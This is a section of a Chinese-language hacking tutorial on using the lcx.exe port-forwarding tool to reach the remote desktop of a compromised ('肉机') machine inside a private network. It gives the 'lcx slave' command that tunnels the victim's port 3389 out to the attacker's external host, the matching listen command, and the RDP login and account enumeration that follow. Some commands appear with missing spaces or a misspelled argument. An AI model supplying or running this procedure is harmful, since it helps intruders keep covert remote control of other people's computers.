1.7 通过LCX端口转发实现内网突破

理论上，只要是连接网络的计算机都可以被访问，但实际上，由于技术水平等原因，这一点往往很难实现。例如，局域网中的某台计算机仅开放了Web服务，该服务只供内网用户使用，外网用户根本没有办法直接访问。因此，要想让外网用户能够访问局域网中的系统服务，就必须进行端口映射等操作。端口映射在入侵内网的时候经常用到，特别是在登录远程终端服务时，使用端口映射是非常方便的。

lcx.exe是一个端口转发工具，相当于把A机上的3389端口转发到具有外网IP地址的B机上，这样，连接B机的3389端口就相当于连接了A机的3389端口。lcx程序多用于被控制计算机（肉机）处于内网的情况，被控制机可能中了木马程序，虽然能够进行控制，但还是不如使用远程终端登录本机进行管理方便。因此，在很多情况下，黑客会想方设法在被控制计算机上开启3389端口，然后通过LCX等程序进行端口转发，进而从本地连接被控制计算机的远程终端并进行管理和使用。

1.7.1 确定被控制计算机的IP地址

在被控制计算机上开启远程终端，然后执行“ipconfig/all”命令，查看其网络配置情况。如图1-65所示，该计算机的IP地址为192.168.80.129。

图1-65 确定被控制计算机的IP地址

1.7.2 在被控制计算机上执行端口转发命令

在被控制计算机上执行“lcx slave 218.69.*.* 51192.168.80.1293389”命令，如图1-66所示，执行完毕会给出一些提示，如果显示为“Make a Connection to 218.69.*.*:51”，则表示端口转发正确。

图1-66 在被控制计算机上执行端口转发命令

1.7.3 在本机上执行监听命令

在本机上打开DOS命令提示符界面，到lcx.exe程序所在路径执行“lcx lister 513389”命令，监听51端口。监听成功，会显示如图1-67所示的数据。

图1-67 在本机上监听51端口

注意

·在本机上监听的端口必须是未使用的端口，可以使用“netstat-an |find "51" ”命令查看。如果没有显示结果，则表示51端口可以用来进行监听。

·被控制计算机与本机成功建立连接后会不停地显示连接数据，如图1-68所示，如果未出现数据发送和接收的情况，说明连接建立不成功。

图1-68 成功建立连接

1.7.4 在本机上使用远程终端进行登录

在DOS提示符下输入“mstsc”命令，打开远程终端连接器，输入“127.0.0.1”后单击“连接”按钮进行远程终端连接，在出现登录界面后分别输入用户名和密码，验证通过后，即可远程进入被控制计算机的桌面。如图1-69所示，输入“ipconfig/all”及“net user”命令，可以查看网络配置情况及用户信息。

图1-69 远程登录被控制计算机

1.7.5 查看本地连接

在被控制计算机上使用“netstat-an”命令查看当前所有的连接时，可以看到被控制计算机在与其本身进行远程终端连接，如图1-70所示，而实际的3389端口是与本机的51端口连接的。

图1-70 查看实际网络连接